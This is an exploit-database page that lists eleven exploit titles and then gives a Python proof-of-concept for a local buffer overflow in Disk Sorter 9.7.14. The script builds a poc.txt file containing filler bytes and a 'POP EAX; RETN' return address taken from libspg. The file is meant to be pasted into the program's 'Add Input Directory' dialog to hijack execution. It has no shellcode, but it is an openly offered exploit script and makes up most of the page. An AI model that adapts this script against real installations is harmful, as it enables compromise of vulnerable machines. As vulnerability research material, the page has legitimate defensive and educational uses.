cd6e21e600
11 new exploits Disk Sorter 9.7.14 - 'Input Directory' Local Buffer Overflow DNSTracer 1.8.1 - Buffer Overflow Parallels Desktop - Virtual Machine Escape Subsonic 6.1.1 - XML External Entity Injection BIND 9.10.5 - Unquoted Service Path Privilege Escalation Cisco Catalyst 2960 IOS 12.2(55)SE1 - 'ROCEM' Remote Code Execution Joomla! Component Payage 2.05 - 'aid' Parameter SQL Injection EnGenius EnShare IoT Gigabit Cloud Service 1.4.11 - Remote Code Execution Subsonic 6.1.1 - Cross-Site Request Forgery Subsonic 6.1.1 - Server-Side Request Forgery Subsonic 6.1.1 - Cross-Site Request Forgery / Cross-Site Scripting
27 lines
No EOL
980 B
Python
Executable file
27 lines
No EOL
980 B
Python
Executable file
#!/usr/bin/python
|
|
|
|
######################################
|
|
# Exploit Title: DiskSorter v9.7.14 - Input Directory Local Buffer Overflow - PoC
|
|
# Date: 25 May 2017
|
|
# Exploit Author: n3ckD_
|
|
# Vendor Homepage: http://www.disksorter.com/
|
|
# Software Link: http://www.disksorter.com/setups/disksorter_setup_v9.7.14.exe
|
|
# Version: Disk Sorter v9.7.14 (32-Bit)
|
|
# Tested on: Windows 7 Enterprise SP1 (Build 7601)
|
|
# Usage: Run the exploit, copy the text of the poc.txt into the 'Inputs -> Add Input Directory' dialog
|
|
######################################
|
|
|
|
print "DiskSorter v9.7.14 (32-Bit) - Input Directory Local Buffer Overflow - PoC"
|
|
print "Copy the text of poc.txt into the 'Inputs -> Add Input Directory' dialog"
|
|
|
|
# in libspg:.text
|
|
# 10147C1C 58 POP EAX
|
|
# 10147C1D C3 RETN
|
|
ret = "\x1c\x7c\x14\x10"
|
|
|
|
nops = "\x47\x4F"*24
|
|
buf = nops + "A"*4048 + ret + "MAGIC" + "\n"
|
|
|
|
f = open("poc.txt","w")
|
|
f.write(buf)
|
|
f.close() |